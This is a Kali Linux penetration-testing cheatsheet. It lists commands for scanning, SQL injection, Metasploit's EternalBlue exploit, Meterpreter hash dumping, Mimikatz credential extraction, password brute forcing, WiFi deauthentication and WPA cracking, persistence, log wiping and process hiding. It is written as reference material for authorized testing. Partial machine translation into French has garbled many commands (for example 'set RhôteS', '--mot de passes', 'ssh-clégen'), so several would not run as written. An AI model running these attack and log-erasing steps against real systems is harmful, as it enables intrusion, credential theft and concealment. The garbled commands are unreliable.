Kali Linux Cheatsheet

📋 Copy All Kali Linux commandes 📄 Generate Kali Linux PDF Guide

Kali Linux is a Debian-based Linux distribution specifically designed for criminalistique numérique and tests de pénétration. Developed and maintained by Offensive Security, Kali Linux comes pre-installed with over 600 tests de pénétration tools, making it the go-to platform for cybersecurity professionals, ethical hackers, and security researchers worldwide.

Installation and Setup

Download and Installation

# Download Kali Linux ISO
wget https://cdimage.kali.org/kali-2024.1/kali-linux-2024.1-installer-amd64.iso

# Verify somme de contrôle
sha256sum kali-linux-2024.1-installer-amd64.iso

# Create bootable USB (Linux)
sudo dd if=kali-linux-2024.1-installer-amd64.iso of=/dev/sdX bs=4M status=progress

# Create bootable USB (Windows - use Rufus or similar tool)
# Use Rufus, Etcher, or Win32DiskImager

Virtual Machine Setup

# VMware recommended settings
# RAM: 4GB minimum, 8GB recommended
# Storage: 80GB minimum
# Network: NAT or Bridged

# VirtualBox recommended settings
# RAM: 4GB minimum, 8GB recommended
# Storage: 80GB minimum, VDI format
# Network: NAT or Bridged
# Enable VT-x/AMD-V virtualization

Initial configuration

# Update system
sudo apt update && sudo apt upgrade -y

# Install additional tools
sudo apt install -y kali-linux-large

# Configure non-root user (recommended)
sudo useradd -m -s /bin/bash nom d'utilisateur
sudo usermod -aG sudo nom d'utilisateur
sudo passwd nom d'utilisateur

# Enable SSH (if needed)
sudo systemctl enable ssh
sudo systemctl start ssh

# Configure firewall
sudo ufw enable
sudo ufw default deny incoming
sudo ufw default allow outgoing

Essential Tools and commandes

Information Gathering

# Nmap - scan réseau
nmap -sS -sV -O cible_ip
nmap -sC -sV -oA scan_results cible_ip
nmap --script vuln cible_ip

# Masscan - Fast port scanner
masscan -p1-65535 cible_ip --rate=1000

# Dmitry - Information gathering
dmitry -winsepo output.txt cible.com

# theHarvester - Email and subdomain gathering
theHarvester -d cible.com -l 500 -b google

# Recon-ng - Web reconnaissance framework
recon-ng
[recon-ng][default] > workspaces create cible_workspace
[recon-ng][cible_workspace] > modules load recon/domains-hôtes/google_site_web

vulnérabilité Assessment

# OpenVAS - vulnérabilité scanner
sudo gvm-setup
sudo gvm-start
sudo gvm-feed-update

# Nikto - Web vulnérabilité scanner
nikto -h http://cible.com
nikto -h http://cible.com -o nikto_results.txt

# Dirb - Directory force bruter
dirb http://cible.com
dirb http://cible.com /usr/share/dirb/wordlists/big.txt

# Gobuster - Directory/file force bruter
gobuster dir -u http://cible.com -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
gobuster dns -d cible.com -w /usr/share/wordlists/dnsmap.txt

# WPScan - WordPress vulnérabilité scanner
wpscan --url http://cible.com --enumerate u,p,t
wpscan --url http://cible.com --mot de passes /usr/share/wordlists/rockyou.txt

application web Testing

# Burp Suite - application web security testing
burpsuite &

# OWASP ZAP - application web scanner
zaproxy &

# SQLmap - injection SQL testing
sqlmap -u "http://cible.com/page.php?id=1" --dbs
sqlmap -u "http://cible.com/page.php?id=1" -D database_name --tables
sqlmap -u "http://cible.com/page.php?id=1" -D database_name -T table_name --dump

# Commix - injection de commandees testing
commix --url="http://cible.com/page.php?id=1"

# XSSer - cross-site scripting (XSS) testing
xsser --url "http://cible.com/search.php?q=XSS" --auto

exploitation

# Metasploit Framework
msfconsole
msf6 > search type:exploit platform:windows
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RhôteS cible_ip
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit

# Searchsploit - exploit database search
searchsploit apache 2.4
searchsploit -m 12345.py

# ingénierie sociale Toolkit
setoolkit
# Select from menu options for hameçonnage, credential harvesting, etc.

# BeEF - Browser exploitation framework
beef-xss
# Access web interface at http://127.0.0.1:3000/ui/panel

Post-exploitation

# Meterpreter commandes (within Metasploit session)
meterpreter > sysinfo
meterpreter > getuid
meterpreter > ps
meterpreter > migrate PID
meterpreter > hashdump
meterpreter > screenshot
meterpreter > download C:\\file.txt /tmp/
meterpreter > upload /tmp/file.txt C:\\

# Empire - PowerShell post-exploitation
powershell-empire server
powershell-empire client

# Mimikatz - Credential extraction
mimikatz
mimikatz # privilege::debug
mimikatz # sekurlsa::logonmot de passes
mimikatz # lsadump::sam

mot de passe Attacks

# John the Ripper - cassage de mots de passe
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
john --show hashes.txt

# hashcat - Advanced mot de passe recovery
hashcat -m 1000 -a 0 hashes.txt /usr/share/wordlists/rockyou.txt
hashcat -m 1000 -a 3 hashes.txt ?a?a?a?a?a?a?a?a

# Hydra - Network login cracker
hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://cible_ip
hydra -L users.txt -P mot de passes.txt ftp://cible_ip
hydra -l admin -P /usr/share/wordlists/rockyou.txt cible_ip http-post-form "/login.php:nom d'utilisateur=^USER^&mot; de passe=^PASS^:Invalid"

# Medusa - Parallel login force bruter
medusa -h cible_ip -u admin -P /usr/share/wordlists/rockyou.txt -M ssh
medusa -H hôtes.txt -U users.txt -P mot de passes.txt -M ftp

# Crunch - Wordlist generator
crunch 8 8 -t ,@@@@@@@ -o wordlist.txt
crunch 6 10 abcdefghijklmnopqrstuvwxyz0123456789 -o custom_wordlist.txt

Sécurité Sans Fil

# Aircrack-ng suite - WiFi security testing
# Monitor mode
airmon-ng start wlan0

# Capture packets
airodump-ng wlan0mon

# Capture specific network
airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon

# Deauth attack
aireplay-ng -0 10 -a AA:BB:CC:DD:EE:FF wlan0mon

# Crack WPA/WPA2
aircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.cap

# Reaver - WPS attack
reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -vv

# Wifite - Automated wireless attack
wifite --wpa --dict /usr/share/wordlists/rockyou.txt

criminalistique numérique

# Autopsy - criminalistique numérique platform
autopsy &

# Volatility - Analyse Mémoire
volatility -f memory.dump imageinfo
volatility -f memory.dump --profile=Win7SP1x64 pslist
volatility -f memory.dump --profile=Win7SP1x64 netscan
volatility -f memory.dump --profile=Win7SP1x64 malfind

# Binwalk - Firmware analysis
binwalk firmware.bin
binwalk -e firmware.bin

# Foremost - File carving
foremost -i disk_image.dd -o recovered_files/

# Sleuth Kit - File system analysis
fls -r disk_image.dd
icat disk_image.dd inode_number > recovered_file

Rétro-ingénierie

# Ghidra - NSA Rétro-ingénierie tool
ghidra &

# Radare2 - Rétro-ingénierie framework
r2 binary_file
[0x00000000]> aaa
[0x00000000]> pdf @main

# GDB - GNU Debugger
gdb binary_file
(gdb) run
(gdb) break main
(gdb) continue
(gdb) info registers

# Strings - Extract strings from binaries
strings binary_file
strings -n 10 binary_file|grep -i mot de passe

# Hexdump - Hex viewer
hexdump -C binary_file|head -20
xxd binary_file|head -20

Administration Système

Package Management

# Update package lists
sudo apt update

# Upgrade all packages
sudo apt upgrade -y

# Install specific tools
sudo apt install -y tool_name

# Install Kali metapackages
sudo apt install -y kali-linux-large
sudo apt install -y kali-linux-everything
sudo apt install -y kali-tools-top10

# Search for packages
apt search cléword
apt show package_name

# Remove packages
sudo apt remove package_name
sudo apt purge package_name
sudo apt autoremove

service Management

# Systemctl commandes
sudo systemctl start service_name
sudo systemctl stop service_name
sudo systemctl restart service_name
sudo systemctl enable service_name
sudo systemctl disable service_name
sudo systemctl status service_name

# Common services
sudo systemctl start ssh
sudo systemctl start apache2
sudo systemctl start postgresql
sudo systemctl start mysql

# Check listening ports
netstat -tlnp
ss -tlnp

Network configuration

# Interface configuration
ip addr show
ip link set eth0 up
ip link set eth0 down

# Static IP configuration
sudo nano /etc/network/interfaces
# Add:
# auto eth0
# iface eth0 inet static
# address 192.168.1.100
# netmask 255.255.255.0
# gateway 192.168.1.1

# DNS configuration
sudo nano /etc/resolv.conf
# Add:
# nameserver 8.8.8.8
# nameserver 8.8.4.4

# Restart networking
sudo systemctl restart networking

User Management

# Add user
sudo useradd -m -s /bin/bash nom d'utilisateur
sudo passwd nom d'utilisateur

# Add user to groups
sudo usermod -aG sudo nom d'utilisateur
sudo usermod -aG adm nom d'utilisateur

# Switch user
su - nom d'utilisateur
sudo -u nom d'utilisateur commande

# View user information
id nom d'utilisateur
groups nom d'utilisateur
finger nom d'utilisateur

# Lock/unlock user
sudo usermod -L nom d'utilisateur
sudo usermod -U nom d'utilisateur

Advanced Techniques

Custom Tool Installation

# Install from source
git clone https://github.com/tool/repository.git
cd repository
make && sudo make install

# Python tools
pip3 install tool_name
pip3 install -r requirements.txt

# Go tools
go install github.com/tool/repository@latest

# Ruby gems
gem install tool_name

# Manual Installation
wget https://exemple.com/tool.tar.gz
tar -xzf tool.tar.gz
cd tool
./configure && make && sudo make install

Environment Customization

# Bash aliases
nano ~/.bashrc
# Add useful aliases:
alias ll='ls -la'
alias la='ls -A'
alias l='ls -CF'
alias ..='cd ..'
alias ...='cd ../..'
alias grep='grep --color=auto'
alias nmap='nmap --reason --open --stats-every 3m --max-retries 1 --max-scan-delay 20 --defeat-rst-ratelimit'

# Custom functions
function extract() \\\\{
    if [ -f $1 ] ; then
        case $1 in
            *.tar.bz2)   tar xjf $1     ;;
            *.tar.gz)    tar xzf $1     ;;
            *.bz2)       bunzip2 $1     ;;
            *.rar)       unrar e $1     ;;
            *.gz)        gunzip $1      ;;
            *.tar)       tar xf $1      ;;
            *.tbz2)      tar xjf $1     ;;
            *.tgz)       tar xzf $1     ;;
            *.zip)       unzip $1       ;;
            *.Z)         uncompress $1  ;;
            *.7z)        7z x $1        ;;
            *)     echo "'$1' cannot be extracted via extract()" ;;
        esac
    else
        echo "'$1' is not a valid file"
    fi
\\\\}

# Source the changes
source ~/.bashrc

Automation Scripts

# Basic reconnaissance script
#!/bin/bash
cible=$1
if [ -z "$cible" ]; then
    echo "utilisation: $0 <cible>"
    exit 1
fi

echo "Starting reconnaissance on $cible"
mkdir -p results/$cible

# Nmap scan
echo "Running Nmap scan..."
nmap -sS -sV -sC -O -oA results/$cible/nmap_scan $cible

# Directory énumération
echo "Running directory énumération..."
gobuster dir -u http://$cible -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o results/$cible/gobuster.txt

# Nikto scan
echo "Running Nikto scan..."
nikto -h http://$cible -o results/$cible/nikto.txt

echo "reconnaissance complete. Results saved in results/$cible/"

persistance and Stealth

# SSH clé persistance
ssh-clégen -t rsa -b 4096
ssh-copy-id user@cible_ip

# Cron job persistance
crontab -e
# Add: @reboot /path/to/script.sh

# service persistance
sudo nano /etc/systemd/system/custom.service
# Create service file for persistance

# Log cleaning
sudo truncate -s 0 /var/log/auth.log
sudo truncate -s 0 /var/log/syslog
history -c && history -w

# processus hiding
nohup ./malicious_binary > /dev/null 2>&1 &
disown

dépannage

Common Issues

# WiFi adapter not working
sudo airmon-ng check kill
sudo ifconfig wlan0 down
sudo iwconfig wlan0 mode monitor
sudo ifconfig wlan0 up

# VirtualBox guest additions
sudo apt install -y virtualbox-guest-x11
sudo VBoxClient --clipboard
sudo VBoxClient --draganddrop

# Graphics issues
sudo apt install -y kali-desktop-xfce
sudo dpkg-reconfigure lightdm

# Sound issues
sudo apt install -y pulseaudio
pulseaudio --start

# Network issues
sudo dhclient eth0
sudo systemctl restart networking
sudo systemctl restart NetworkManager

Performance Optimization

# Disable unnecessary services
sudo systemctl disable bluetooth
sudo systemctl disable cups
sudo systemctl disable avahi-démon

# Clean system
sudo apt autoremove
sudo apt autoclean
sudo apt clean

# Monitor resources
htop
iotop
nethogs
iftop

# Optimize for VMs
sudo apt install -y open-vm-tools
sudo apt install -y virtualbox-guest-utils

Security Best Practices

Operational Security

# Use VPN for testing
sudo openvpn config.ovpn

# Proxy chains configuration
sudo nano /etc/proxychains.conf
proxychains nmap cible_ip

# Tor utilisation
sudo systemctl start tor
proxychains firefox

# MAC address randomization
sudo macchanger -r wlan0
sudo macchanger -m 00:11:22:33:44:55 wlan0

# Secure deletion
shred -vfz -n 3 sensitive_file
wipe -rf directory/

Legal and Ethical Considerations

# Always obtain proper autorisation
# Document scope and limitations
# Follow responsible disclosure
# Maintain confidentiality
# Respect privacy and data protection laws

# Create engagement documentation
echo "Penetration Test autorisation" > autorisation.txt
echo "Client: Company Name" >> autorisation.txt
echo "Scope: IP ranges, domains" >> autorisation.txt
echo "Date: $(date)" >> autorisation.txt
echo "Tester: Your Name" >> autorisation.txt

Resources

• Kali Linux Documentation Officielle
• Offensive Security Training
• Kali Linux Tools
• tests de pénétration Execution Standard
• OWASP Testing Guide